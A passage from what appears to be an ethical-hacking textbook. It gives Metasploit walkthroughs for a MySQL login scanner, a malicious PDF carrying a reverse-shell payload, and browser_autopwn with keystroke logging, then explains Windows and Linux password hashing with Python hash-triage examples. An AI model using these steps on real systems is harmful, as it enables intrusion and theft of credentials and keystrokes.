The summary lists the module's basic options (the same list the mode O prints, which shows the basic options only, not the advanced ones) and tells you which of them are required. Here RHOSTS has no default and is required, so it must be supplied on the command line; the other options can be left at their defaults. The two modes you will use most are O, to check the options, and E, to execute the module:

#msfcli auxiliary/scanner/portscan/xmas O
#msfcli auxiliary/scanner/portscan/xmas RHOSTS=IP E

Running the module in mode E is the equivalent of typing exploit (or run) in MSFCONSOLE.



METASPLOITABLE MYSQL

In this exercise we use Metasploit to attack the MySQL database server on Metasploitable. MySQL is the database behind a great many web applications (WordPress, Drupal and others), so a MySQL server with weak credentials is a common and valuable target. The steps are:

1. Start Metasploit by typing msfconsole in a terminal and wait for the msf > prompt.
2. Search for the modules that deal with MySQL: search mysql.
3. Select the MySQL login scanner:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) >

4. Display the module's options with show options.
5. Set the required options (at least RHOSTS, the target address; user and password lists if you want to try more than the defaults) and run the module with exploit.



METASPLOITABLE PDF

Adobe PDF exploit

In this exercise we use Metasploit to build a malicious PDF that carries an embedded executable, to be delivered to the victim by social engineering.

1. Start Metasploit from a terminal with msfconsole.
2. Search for the PDF-related modules: search pdf.
3. Select the module that embeds an EXE in a PDF for a social-engineering attack:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

4. Display the module's options with show options.
5. Note the two options FILENAME and INFILENAME.
6. FILENAME is the name of the PDF file the module will produce.
7. INFILENAME is the path of the existing (benign) PDF into which the executable is embedded.

set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf

8. Run the module with exploit.

In this exercise MSFCONSOLE was used to run an exploit that embeds an executable in a PDF so that a Meterpreter session is obtained when the victim opens the file. The module reads the input PDF, adds the EXE to it and writes the result under the name given in FILENAME; that file is then sent to the victim. The default payload of this module is a Windows reverse TCP Meterpreter, so the victim's machine connects back to the attacker. Note that the file-format module only builds the document: to receive the connection, a handler (exploit/multi/handler with the same payload and LHOST) has to be listening when the victim opens the PDF.

IMPLEMENTING BROWSER_AUTOPWN

BROWSER_AUTOPWN is an auxiliary module of Metasploit that starts a web server with a collection of browser exploits behind it. When a victim's browser is lured to the server's URL (by phishing, social engineering or a redirect), the module fingerprints the browser and launches every exploit that matches it, with the aim of getting a session on the client.

1. Start Metasploit from a terminal with msfconsole.
2. Search for the module: search autopwn.
3. Select BROWSER_AUTOPWN:

use auxiliary/server/browser_autopwn

4. Set the payload to a Windows reverse TCP Meterpreter:

set payload windows/meterpreter/reverse_tcp

5. Display the module's options with show options.
6. Note the options LHOST and URIPATH.
7. Set LHOST to your own (attacker) IP address, the address the victim's browser will connect back to, and URIPATH to the path under which the exploits are served:

set LHOST 192.168.10.109
set URIPATH "filetypes"

8. Run the module with exploit.
9. Metasploit starts the server and prints the URL the victim has to visit, of the form http://[Provided IP Address]:8080/filetypes.
10. When a victim browses to that URL, browser_autopwn fingerprints the browser, fires the matching exploits and, if one of them succeeds, opens a session. To interact with the first session:

sessions -i 1

11. In the Meterpreter shell, help lists the available commands.
12. For example, keyscan_start begins recording the victim's keystrokes:

keyscan_start

13. keyscan_dump then prints whatever the victim has typed since.

In this exercise MSFCONSOLE was used to run browser_autopwn, which wraps a whole collection of browser exploits behind one URL. With the windows/meterpreter/reverse_tcp payload a successful exploit returned a Meterpreter session, and that session was used to capture keystrokes. This has been a brief tour of Metasploit rather than a complete treatment; the framework deserves a book of its own.



5.3 CRACKING PASSWORDS

System hacking proceeds through a series of steps: cracking passwords, escalating privileges, executing applications, hiding files and covering tracks. The first of these, cracking passwords, is the subject of this section.

Passwords are the first line of defence of a system, so the obvious way to break in is to obtain the password of a valid account. The difficulty for the defender is that people are bad at inventing and remembering passwords: a password strong enough to resist guessing is hard to remember, so users pick short passwords, dictionary words, names and dates, and reuse them across systems. An attacker who knows this can often get in by guessing, with no technical exploit at all. Default and generic accounts make it worse: a system that still has accounts such as user or guest with their default passwords can be entered immediately, and even an account with few rights is a foothold from which the attacker goes on to escalate privileges.

WHAT IS PASSWORD CRACKING?

Password cracking is the process of recovering passwords from data that a computer system stores or transmits. Attackers use it to gain unauthorised access to a system; it is also used legitimately to recover a forgotten password and to test the strength of the passwords in use. Most password cracking succeeds not because the cryptography is broken but because the passwords themselves are weak: users choose passwords that appear in dictionaries or that are short enough to enumerate, so an attacker can recover them with a dictionary attack or, failing that, with a brute-force attack.
PASSWORD COMPLEXITY

Password complexity describes how large a character set and how many characters a password draws on. The more kinds of characters a password may contain, and the longer it is, the more candidates an attacker has to try before finding it. Examples of the classes a password can fall into:

Passwords that contain letters, special characters and numbers: ap1@52
Passwords that contain only numbers: 23698217
Passwords that contain only special characters: &*#@!(%)
Passwords that contain letters and numbers: meet123
Passwords that contain only letters: PUTHMYDE
Passwords that contain only letters and special characters: bob@&ba
Passwords that contain only special characters and numbers: 123@$4

Before going into the cracking techniques themselves, we need to know where passwords are kept: how the operating systems (Windows, Linux and Unix) and the network equipment (routers and switches) store them.

SAM Database

Windows stores the hashes of user passwords (often loosely called encrypted password hashes) in a database called the Security Accounts Manager, SAM.

SAM, the Security Accounts Manager database, is the file in which Windows keeps the accounts and the hashed passwords of local users. Passwords are never stored in clear: each one is run through a one-way function and only the resulting hash is kept, so the system can verify a password by hashing what the user types and comparing, without ever being able to recover the original. SAM is implemented as a registry hive.

Since Windows NT and Windows 2000 the SAM file has lived in C:\Windows\System32\Config\ (that is, %SYSTEMROOT%\system32\config\SAM). While Windows is running the file is held open exclusively by the kernel and cannot be opened, copied or moved by any other process, not even an administrator's, which is the first obstacle for an attacker who wants the hashes. The usual way round it is not to run that Windows at all: boot the machine from a live operating system on CD or USB, mount the disk and copy the SAM file from there. Tools that dump the hashes from a running system do so by reading them out of the registry in memory rather than by opening the file.

SYSKEY

Windows NT 4.0 Service Pack 3 introduced SYSKEY, a utility that adds a layer of encryption to the password hashes in SAM: the hashes are encrypted with a 128-bit system key, so a copy of the SAM file alone is no longer enough to read them. In 1999 BindView published a weakness in SYSKEY's design, the "Syskey Bug": the way the hashes were encrypted allowed a cryptanalytic attack that stripped the protection, after which the hashes could be attacked by brute force just as in an unprotected SAM. Microsoft corrected the flaw in a later fix. The practical consequence for an attacker is that a SAM file obtained offline still has to be decrypted with the system key, which is itself stored in the SYSTEM hive in the same directory, so both files have to be copied.

http://technet.microsoft.com/library/cc723740.aspx
http://en.wikipedia.org/wiki/Cryptographic_hash_function

Note: the description above applies to local accounts on a workstation or member server. On a domain controller the domain accounts and their hashes are not kept in SAM but in the Active Directory database.
How password hashes are stored in the Windows SAM

[Figure: a dump of c:\windows\system32\config\SAM. Each line has the form

    username:RID:LM hash:NT hash:::

for example Administrator (RID 500), Guest (RID 501, with NO PASSWORD in both hash fields), HelpAssistant (1000), SUPPORT_388945a0 (1002), Hackers (1003), Admin (1004, NO PASSWORD), Martin (1005), John (1006), Jason (1007) and jsmith (1008). The columns are labelled User name, User ID, LM Hash and NTLM Hash.]


When a user account is created, Windows stores the password in the SAM (or, for a domain account, in Active Directory) in two hashed forms: the LAN Manager-compatible password, the LM hash, and the Windows password, the NT hash (also called the NTLM hash). Each is a one-way function (OWF) of the password, and both SAM and Active Directory hold both forms.

The LAN Manager-compatible password (LM hash) is computed as follows. The password is converted to upper case and to the OEM character set, then padded with NULL bytes to exactly 14 bytes. The 14 bytes are split into two 7-byte halves, and each half is used as a DES key to encrypt a fixed constant. The two 8-byte ciphertexts, concatenated, form the 16-byte LAN Manager OWF. The only primitive involved is DES.

The Windows password (NT hash) is derived from the password in Unicode (UTF-16LE), with case preserved, and is the 128-bit MD4 digest of that byte string (RSA's MD4 algorithm). There is no 14-character limit and no case folding.

A valid LM hash is still stored by default on many versions of Windows, which is the main reason Windows password hashes are considered weak; Windows Vista and Windows 7 no longer store it by default. The LM hash cannot represent more than 14 characters, so a password longer than 14 characters has no LM hash: the SAM then holds a "dummy" LM value for that account, the hash of the empty string, which carries no information about the password. The same dummy value is stored when LM hashes are disabled by policy, so a dump of the SAM shows the LM field as blank for such accounts, and a cracker has to go after the NT hash instead.

Password hash using LM/NTLM

The user Martin with the password magician is stored in the SAM as

    Martin:1008:624AAC413795CDC14EB35F1CD90F4C76:6F585FF8FF6280B59CCE252FDB5D0EB8:::

(the RID, then the LM hash, then the NT hash).

What is the LAN Manager hash (LM hash)?

The LAN Manager hash is the older of the two password hashes. It comes from Microsoft LAN Manager and was the hash used by Windows versions up to and including Windows NT; later versions still compute and store it for backward compatibility, which is why it matters. It limits the usable length of a password to 14 characters. Microsoft Windows NT stores two hashes of every password: the LAN Manager (LM) password hash and the Windows NT password hash.

Take the password '123456qwerty' as an example. To compute the LM hash the password is first converted to upper case, giving '123456QWERTY'. It is then padded with NULL (blank) characters to a length of exactly 14: '123456QWERTY__', where the two underscores stand for the NULL bytes. Before the hash is computed the 14-character string is split into two 7-byte halves, '123456Q' and 'WERTY__', and from here on the halves are processed completely independently:

    123456Q = 6BF11E04AFAB197F
    WERTY__ = F1E9FFDCC75575B15

    The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

(values as printed in the book; the second value has one hexadecimal digit too many for an 8-byte DES block, which is an error in the original).

Each 7-byte half becomes a DES key (7 bytes = 56 bits, exactly the DES key size) and is used to encrypt a fixed constant, the "magic number" of the LM scheme, which is the 8-byte ASCII string KGS!@#$%. Each encryption yields 8 bytes, and the two results are concatenated to give the 16-byte LM hash. The first 8 bytes of the hash therefore depend only on the first 7 characters of the password and the last 8 bytes only on characters 8 to 14. If the password is 7 characters or shorter, the second half is all NULL bytes and its ciphertext is always the same constant, 0xAAD3B435B51404EE, whatever the rest of the password is. The LM hash of 'WELCOME', for instance, is

    0xC23413A8A1E7665FAAD3B435B51404EE

and the trailing AAD3B435B51404EE immediately tells a cracker that the password is at most 7 characters long, so only the first half has to be attacked.

This design is what makes LM hashes so weak: folding to upper case shrinks the character set, each half is an independent 7-character problem (only 26^7 combinations for a password made of letters) instead of one 14-character problem, and there is no salt, so the same password always gives the same hash and pre-computed tables work. Modern Windows versions no longer store LM hashes by default, and on older ones they can be turned off with the NoLMHash policy, but the hash may still be present on systems that were upgraded in place, and it must be removed explicitly.

The LAN Manager OWF is thus 16 bytes made of two 8-byte DES ciphertexts: the first 8 bytes come from the first 7 characters of the password and the last 8 bytes from the next 7 characters.

NTLMv2 is a newer challenge/response authentication protocol that improves on the old LM and NTLMv1 exchanges. On systems that still send LM responses the weakness of the hash is exposed on the network as well, so the LAN Manager authentication level should be raised to "Send NTLMv2 responses only".
Example: generating an LM hash

Until Windows Vista and Windows 7, every version of Windows kept an LM hash in the SAM for every password of fewer than 15 characters. Take the password cehpass1 as an example. The steps are:

1. Padded with NULL to 14 characters: the 8-character password becomes cehpass1 followed by six NULL bytes.
2. Converted to upper case: "CEHPASS1" (plus the padding).
3. Separated into two 7-character strings: "CEHPASS" and "1______" (the digit 1 followed by six NULL bytes).

Each of the two strings is then used as the key of a DES (Data Encryption Standard) encryption, a symmetric cipher, of the fixed LM constant, and the two 8-byte results are joined to give the 16-byte LM hash. Note that the second half here depends on a single character, '1': a cracker who sees that half recovers the character almost instantly and is then left with a 7-character problem for the first half.
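The pre-processing just described, and the triage of a hash dump that follows from it, as an added example in Python. This is not code from the book: the DES step is omitted (the standard library has no DES), so the function stops at the two 7-byte key halves, and the OEM code page is assumed to be Latin-1. The blank-half constant AAD3B435B51404EE and the empty-string NT hash are the well-known values quoted in the text; the dump below is constructed for the example, and its NT hashes other than Guest's are placeholders rather than real hashes.

```python
"""LM hash pre-processing and triage of a dumped SAM (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# DES of the LM constant under an all-NULL 7-byte half (quoted in the text);
# an LM field of two such halves means no usable LM hash is stored.
BLANK_LM_HALF = "AAD3B435B51404EE"
BLANK_LM_HASH = BLANK_LM_HALF * 2
# NT hash (MD4 over UTF-16LE) of the empty password.
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"


def lm_halves(password: str) -> Optional[Tuple[bytes, bytes]]:
    """Upper-case, pad with NULL to 14 bytes and split into the two 7-byte
    DES keys. Returns None when the password exceeds 14 characters, in which
    case Windows stores the dummy (blank) LM hash instead.
    Assumption: the OEM code page is treated as Latin-1 here."""
    if len(password) > 14:
        return None
    raw = password.upper().encode("latin-1", "replace").ljust(14, b"\x00")
    return raw[:7], raw[7:]


@dataclass
class DumpedAccount:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def lm_present(self) -> bool:
        return self.lm_hash != BLANK_LM_HASH

    @property
    def at_most_7_chars(self) -> bool:
        # A blank second half means characters 8..14 were all NULL padding,
        # so only the first 7-character half has to be cracked.
        return self.lm_present and self.lm_hash[16:] == BLANK_LM_HALF

    @property
    def empty_password(self) -> bool:
        return self.nt_hash == EMPTY_NT_HASH


def parse_dump(text: str) -> List[DumpedAccount]:
    """Parse pwdump-style lines: user:RID:LM hash:NT hash:::"""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed line: {line!r}")
        lm, nt = parts[2].upper(), parts[3].upper()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length: {line!r}")
        accounts.append(DumpedAccount(parts[0], int(parts[1]), lm, nt))
    return accounts


def triage(text: str) -> dict:
    """Which accounts a cracker (or an auditor) should look at first."""
    report = {"lm_present": [], "at_most_7_chars": [], "empty_password": []}
    for acct in parse_dump(text):
        for key in report:
            if getattr(acct, key):
                report[key].append(acct.user)
    return report


# Constructed sample dump. Administrator's LM value is the hash of WELCOME
# and Martin's line is the magician example from the text; the other NT
# hashes are placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:C23413A8A1E7665FAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Martin:1005:624AAC413795CDC14EB35F1CD90F4C76:6F585FF8FF6280B59CCE252FDB5D0EB8:::
longpass:1010:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
"""

if __name__ == "__main__":
    print(lm_halves("123456qwerty"))  # (b'123456Q', b'WERTY\x00\x00')
    print(triage(SAMPLE_DUMP))
```

The triage report is the order in which to spend cracking time: accounts with a real LM hash first, and among those the ones whose second half is blank, since each of them is a 7-character upper-case search.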






Comparison of LM, NTLMv1 and NTLMv2

Each new version of NTLM corrected weaknesses of the one before it, as the comparison shows:

  Attribute                 LM                        NTLMv1                    NTLMv2
  ------------------------  ------------------------  ------------------------  --------
  Password case sensitive   No                        Yes                       Yes
  Hash key length           56 bit + 56 bit           N/A                       N/A
  Password hash algorithm   DES (ECB mode)            MD4                       MD4
  Hash value length         64 bit + 64 bit           128 bit                   128 bit
  C/R key length            56 bit + 56 bit + 16 bit  56 bit + 56 bit + 16 bit  128 bit
  C/R algorithm             DES (ECB mode)            DES (ECB mode)            HMAC_MD5
  C/R value length          64 bit + 64 bit + 64 bit  64 bit + 64 bit + 64 bit  128 bit

(C/R = challenge/response.)

NTLM Authentication

NTLM (NT LAN Manager) is Microsoft's challenge/response authentication protocol, used to authenticate users to hosts and to domains on Windows networks and still found on most Windows systems. It was introduced to improve on the LAN Manager protocol and was for a long time the default authentication protocol of Windows. Its weaknesses are well documented and could not be fixed without breaking compatibility, so since Windows 2000 Microsoft's default authentication protocol has been Kerberos. Even so, NTLM is still widely used: for workgroups and local accounts, for older systems, for servers that cannot be reached through the Kerberos ticket mechanism, and by a great deal of software that falls back to it, and Kerberos is only used where a domain is present.

NTLM authentication is a challenge/response scheme: the server convinces itself that the client knows the password without the password ever crossing the network. It exists in two flavours, the LM authentication protocol and the NTLM authentication protocol, and both use the password hashes stored in the SAM (or in Active Directory) as the keys of the exchange, which is why possession of the hash is as good as possession of the password.

NTLM Authentication Protocol

NTLM is a proprietary Microsoft protocol with no published specification, so non-Microsoft products that need to talk to Windows implement it from reverse-engineered descriptions, and there are libraries that do exactly that. It is used on the network for file sharing and, outside Windows itself, for authenticating HTTP requests and SOAP web-service calls.

NTLM authentication (challenge/response) is carried in three messages, conventionally called Type 1, Type 2 and Type 3: (1) negotiation, (2) challenge and (3) authentication. The exchange runs as follows:

1. The client sends a Type 1 message to the server. It contains flags announcing the features the client supports and wants to use, together with the client's host and domain names.
2. The server replies with a Type 2 message. It contains the flags the server accepts from the client's offer, which settle the options used for the rest of the exchange, and, most importantly, a random challenge (the nonce) that the client must respond to.
3. The client sends a Type 3 message carrying the user name and domain, the host name, and the response to the challenge, computed from the challenge and the user's password hash. The server verifies the response with the hash it has on file for that user.

NTLM Authentication Process

NTLM actually covers three forms of challenge/response authentication: LM, NTLMv1 and NTLMv2. All three follow the same basic scheme and differ in the hash and the response algorithm, and therefore in their security. Client and server agree on which one to use through Microsoft's negotiated Security Support Provider (SSP), the mechanism that lets a carrier protocol such as SMB or HTTP use whichever authentication method both sides support.

When a user logs on to a domain from a Windows client, the client does not send the password to the domain controller; it sends a response computed from a challenge, as follows.

1. The user types the password into the logon window. Windows runs it through the hash algorithm and keeps the hash in memory.
2. The client sends a logon request to the domain controller (DC).
3. The DC generates a random 16-byte value, the nonce, and sends it to the client as the logon challenge.
4. The client encrypts the nonce with the user's password hash and sends the result, the response, to the DC.
5. The DC looks up the user's stored password hash in its own database (the SAM or Active Directory), encrypts the same nonce with it and compares the result with the response it received.
6. If the two match, the logon succeeds.

[Figure: the exchange between the client computer and the Windows domain controller for the user Martin. The client runs the typed password through the hash algorithm (Martin:1008:624AAC413795CDC14EB35F1CD90F4C76:6F585FF8FF6280B59CCE252FDB5D0EB8:::), sends the logon request, receives the logon challenge and sends its response; the domain controller, which has its own stored copy of the user's hashed password, compares the computer's response with the response it created from that copy. If they match, the logon is a success.]

Note: Microsoft has since upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.
Kerberos

Kerberos is a network authentication protocol. It provides strong authentication for client/server applications using secret-key cryptography, and it authenticates both sides: the client proves its identity to the server and the server proves its identity to the client (mutual authentication). The messages of the protocol are protected against eavesdropping and replay.

Kerberos relies on a trusted third party, the Key Distribution Center (KDC), which consists of two logically separate parts: the Authentication Server (AS) and the Ticket Granting Server (TGS). Kerberos uses "tickets" to prove the identity of users.

A user who logs on first obtains a Ticket Granting Ticket (TGT) from the Authentication Server; the TGT is the proof that the user has been authenticated. With the TGT the user asks the TGS for a service ticket for each service to be used, without entering the password again: entering the password once gives access to every service the user has rights to. Note that all of this ticket traffic, between the client and the KDC and between the client and the application servers, travels over the network in packets and can be observed there; the tickets are encrypted, which is what the design depends on.

[Figure: Kerberos exchange with the Key Distribution Center (KDC), which contains the Authentication Server (AS), the Ticket Granting Server (TGS) and the database.
1. User requests authentication from the AS.
2. Reply of the AS to the user's request.
3. Request to the TGS for a service ticket.
4. Reply of the TGS to the client's request.
5. Request to an application server to access a service.
6. Reply to prove it really is the server the client is expecting.]


Salting

Salting strengthens the stored form of a password by prepending or appending random characters, the salt, to the password before it is hashed, and storing the salt alongside the hash. The salt makes the stored hashes differ even for users who chose the same password, so an attacker cannot tell from the hash file which users share a password, and, more importantly, it defeats pre-computed hash attacks: a table of hashes computed in advance (a rainbow table, for instance) is useless, because the attacker would need a separate table for every possible salt.

In this usage a salt is a string of random bits that is fed, together with the password, into the key derivation function (or hash); the other input is the password itself, and the output, rather than the plain hash of the password, is what is stored. Because the salt is different for each user, the same password gives a different stored value for every user, which forces an attacker to repeat the work for each account instead of once for the whole file.

[Figure: Salting technique prevents deriving passwords from the password file. Three users, Alice, Bob and Cecil, all have the password root, yet the stored representation differs: each entry shows a different salt and a different hash. Advantage: defeats pre-computed hash attacks.]

Note: Windows password hashes (LM and NT) are not salted.
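What the salt buys the defender, as an added example that is not part of the book. It uses SHA-256 from the standard library in place of the crypt-style functions the text discusses (the principle is identical) and a constructed four-word dictionary: an attacker builds a hash table once and cracks an unsalted password file with a lookup per user, while against salted records the same table finds nothing and the hashing has to be redone for every account.

```python
"""Salted hashing versus a pre-computed hash table (added example)."""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def unsalted_hash(password: str) -> str:
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def salted_hash(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def make_record(password: str, salt: Optional[bytes] = None) -> str:
    """Stored form 'salt$hash': the salt is not secret; it is kept with the
    hash so the verifier can recover it, as /etc/shadow does."""
    if salt is None:
        salt = os.urandom(8)
    return salt.hex() + "$" + salted_hash(password, salt)


def verify(record: str, candidate: str) -> bool:
    salt_hex, digest = record.split("$", 1)
    return hmac.compare_digest(salted_hash(candidate, bytes.fromhex(salt_hex)), digest)


def build_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Attacker's pre-computed table: hash -> plaintext, built once, reused."""
    return {unsalted_hash(w): w for w in wordlist}


def lookup(table: Dict[str, str], stored: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Crack a whole unsalted password file with one table lookup per user."""
    return {user: table.get(digest) for user, digest in stored.items()}


def crack_salted(record: str, wordlist: Iterable[str]) -> Optional[str]:
    """With a salt the attacker must redo the hashing for each account."""
    for word in wordlist:
        if verify(record, word):
            return word
    return None


WORDLIST = ["root", "password", "letmein", "magician"]  # constructed

if __name__ == "__main__":
    table = build_table(WORDLIST)
    users = ("alice", "bob", "cecil")
    unsalted_file = {u: unsalted_hash("root") for u in users}
    print(lookup(table, unsalted_file))       # all three recovered at once
    salted_file = {u: make_record("root") for u in users}
    print(len(set(salted_file.values())))     # 3 different stored values
    print(lookup(table, {u: r.split("$")[1] for u, r in salted_file.items()}))  # nothing
    print(crack_salted(salted_file["alice"], WORDLIST))  # per-account work still finds weak ones
```

The salt does not make a weak password strong: crack_salted still finds "root" in a few trials. It only removes the attacker's ability to amortise that work over every user and every system that uses the same hash.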



Before looking at how Linux stores passwords it helps to separate the two questions the system answers about every user (the user model). The first is authentication: is this really the user who claims to be logging in, that is, is the password right? The second is authorization: now that the user is known, what is the user allowed to do on the system? Linux answers the first question, user authentication, with the account information kept in its password files.

Traditionally, Unix kept all account information, password included, in /etc/passwd:

[elvis@station1 ~]$ cat /etc/passwd
julius:hT5jjpGzIu.F2:500:500::/home/julius:/bin/bash
pataki:yT7ifgqMAkaQ.:501:501::/home/pataki:/bin/bash
elvis:zTDZ7mF286Pil:502:502::/home/elvis:/bin/bash
maxwell:.U2cbRqM1/YFQ:503:503::/home/maxwell:/bin/bash

/etc/passwd mixes authentication with account information. The second field, the 13 characters after the user name, is the authentication information: the encrypted (hashed) password against which the question "is the password right?" is decided. The remaining fields hold the account information: the UID, the GID, the home directory and the login shell, everything the system needs to set up the user's session once the user is in.

Because /etc/passwd must be readable by every user (programs such as ls need it to map UIDs to names), every user could read every hashed password and attack it offline. Most Linux and Unix systems therefore use shadow passwords: the hashes are moved out of the world-readable /etc/passwd into /etc/shadow, which only root can read, and the password field of /etc/passwd holds just an x:

[elvis@station1 ~]$ ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2118 Jan 5 22:00 /etc/passwd
-r-------- 1 root root 1787 Jan 5 22:01 /etc/shadow
[elvis@station1 ~]$ tail -3 /etc/passwd
bob:x:510:510::/home/bob:/bin/bash
prince:x:511:511::/home/prince:/bin/bash
hogan:x:512:512::/home/hogan:/bin/bash
[elvis@station1 ~]$ tail -3 /etc/shadow
tail: cannot open `/etc/shadow' for reading: Permission denied
[elvis@station1 ~]$ su -c "tail -3 /etc/shadow"
Password: (root's password)
bob:$1$TQDu0v4Y$es6TNbzi0BTfdhEPirhlo.:13154:0:99999:7:::
prince:$1$YQJaM/hi$bjT9lXc.GudbBzSAOdIFC0:13154:0:99999:7:::
hogan:$1$t7HZVQHk$rwrENrqtO.O/wtjlPevspO:13154:0:99999:7:::
How is the password "apple" stored by passwd?

When the passwd command is run, the following happens:

1. The user types the new password in plaintext: "apple".
2. passwd generates a random two-character salt, in this example "F8".
3. It combines the salt with the password and runs the salted password through a one-way encryption function (traditionally a DES-based function used as a hash). The result is the cyphertext "aHBT91IoaZc", which cannot be turned back into "apple", not even with the salt.
4. passwd writes the salt followed by the cyphertext, "F8aHBT91IoaZc", into the password field of the user's line in /etc/passwd. The first two characters of the field are thus the salt ("F8") and the remaining eleven are the cyphertext ("aHBT91IoaZc").

The same thing in practice, setting the password of the user elvis to "apple":

[root@station1 ~]# passwd elvis
Changing password for user elvis.
New UNIX password: apple
BAD PASSWORD: it is too short
Retype new UNIX password: apple
passwd: all authentication tokens updated successfully.
[root@station1 ~]# grep elvis /etc/passwd
elvis:F8aHBT91IoaZc:502:502::/home/elvis:/bin/bash

(root may set a weak password in spite of the warning; an ordinary user would be refused.)

When elvis later logs in, the system reads the salt from his /etc/passwd entry, combines it with the password he typed, runs the result through the same one-way function and compares the new cyphertext with the one stored in /etc/passwd. If they match, the password was right and the user is authenticated; the plaintext password is never stored and never needed.

Password Management

As noted above, modern Linux systems use shadow passwords and keep the cyphertext in /etc/shadow. They also replace the traditional hash. The original Unix password function was based on DES and used at most 8 characters of the password, each contributing 7 bits (ASCII), for an effective key of (8 characters) * (7 bits/character) = 56 bits, which is far too small today. Red Hat-based systems instead use MD5 passwords, which have no 8-character limit and produce a 128-bit hash, and the authentication configuration tool system-config-authentication lets the administrator select both md5 passwords and shadow passwords; both are the default on current installations.

With MD5 and shadow passwords the cyphertext ends up in /etc/shadow:

[root@station1 ~]# grep elvis /etc/shadow
elvis:$1$CBYGbXRT$hTMRC01udINgdlLH/9quu1:13155:0:99999:7:::

An MD5 password field consists of three parts separated by dollar signs ("$"). The first part, "1", identifies the hashing algorithm: "1" is MD5. The second part, "CBYGbXRT", is the salt, which may now be up to 8 characters rather than 2. The third part, "hTMRC01udINgdlLH/9quu1", is the cyphertext. The remaining colon-separated fields of the line hold the password-ageing information: the day the password was last changed (counted from 1 January 1970) and the minimum, maximum and warning periods in days.
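A parser for the two file formats just described, as an added example written for this page rather than taken from the book. It recognises the traditional 13-character DES field (2-character salt plus 11 characters of cyphertext), the "$id$salt$hash" form (the text shows $1$ for MD5; $5$ and $6$ are the SHA-256 and SHA-512 variants of the same scheme), the "x" that points to /etc/shadow, and locked fields ("!", "!!", "*"). The weak_accounts helper is a small audit: which accounts still have a world-readable hash, or one in the 56-bit DES or MD5 schemes. The sample lines in the test are the ones printed in the text.

```python
"""Parsing /etc/passwd and /etc/shadow entries (added example)."""
from dataclasses import dataclass
from typing import List, Optional

# crypt(3) $id$ prefixes: $1$ is shown in the text; 5 and 6 are the SHA variants.
CRYPT_IDS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512"}


@dataclass
class PasswordField:
    algorithm: str          # "DES", "MD5", "SHA-256", "SHA-512", "shadow" or "none"
    salt: str
    ciphertext: str
    shadowed: bool = False  # field is "x": the real hash lives in /etc/shadow
    locked: bool = False    # "!", "!!", "*" or empty: password logon impossible


def parse_password_field(field: str) -> PasswordField:
    if field == "x":
        return PasswordField("shadow", "", "", shadowed=True)
    locked = field.startswith("!")
    body = field.lstrip("!")
    if body in ("", "*"):
        return PasswordField("none", "", body, locked=True)
    if body.startswith("$"):
        parts = body.split("$")  # "$id$salt$hash" -> ["", id, salt, hash]
        if len(parts) != 4 or parts[1] not in CRYPT_IDS:
            raise ValueError(f"unsupported crypt format: {field!r}")
        return PasswordField(CRYPT_IDS[parts[1]], parts[2], parts[3], locked=locked)
    if len(body) == 13:
        # traditional DES crypt: 2-character salt followed by 11 characters
        return PasswordField("DES", body[:2], body[2:], locked=locked)
    raise ValueError(f"unrecognised password field: {field!r}")


@dataclass
class PasswdEntry:
    name: str
    password: PasswordField
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


@dataclass
class ShadowEntry:
    name: str
    password: PasswordField
    last_change: Optional[int]  # days since 1970-01-01
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]


def _int_or_none(s: str) -> Optional[int]:
    return int(s) if s else None


def parse_passwd_line(line: str) -> PasswdEntry:
    f = line.rstrip("\n").split(":")
    if len(f) != 7:
        raise ValueError(f"passwd line needs 7 fields: {line!r}")
    return PasswdEntry(f[0], parse_password_field(f[1]), int(f[2]), int(f[3]), f[4], f[5], f[6])


def parse_shadow_line(line: str) -> ShadowEntry:
    f = line.rstrip("\n").split(":")
    if len(f) != 9:
        raise ValueError(f"shadow line needs 9 fields: {line!r}")
    return ShadowEntry(f[0], parse_password_field(f[1]), *[_int_or_none(x) for x in f[2:6]])


def weak_accounts(passwd_text: str, shadow_text: str = "") -> List[str]:
    """Accounts whose hash is world-readable (still in /etc/passwd) or uses
    the 56-bit DES or the MD5 scheme discussed in the text."""
    weak: List[str] = []
    for line in passwd_text.splitlines():
        e = parse_passwd_line(line)
        if not e.password.shadowed and not e.password.locked:
            weak.append(e.name)
    for line in shadow_text.splitlines():
        s = parse_shadow_line(line)
        if s.password.algorithm in ("DES", "MD5") and s.name not in weak:
            weak.append(s.name)
    return weak
```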
PASSWORD CRACKING TECHNIQUES

Password cracking is the set of techniques used to recover passwords from the data a system stores or transmits. This section looks at the techniques for getting past password-based authentication, that is, for discovering a user's password. The attacker's basic problem is to find, among all possible strings, the one that produces the hash (or the response) on record; the techniques differ in how they choose which candidates to try.

DICTIONARY ATTACKS

In a dictionary attack, a dictionary file is loaded into the cracking application, which tries every entry against the user accounts. The dictionary is simply a text file of words, one per line; the application hashes each word and compares it with the stored hash until one matches. A dictionary attack is much faster than a brute-force attack because it tries only words people actually use, but for the same reason it fails against passwords that are not words, and it is useless against passphrases.

In cryptanalysis the same idea is used to find the key that decrypts a given ciphertext: candidate keys are drawn from a list rather than from the whole keyspace.

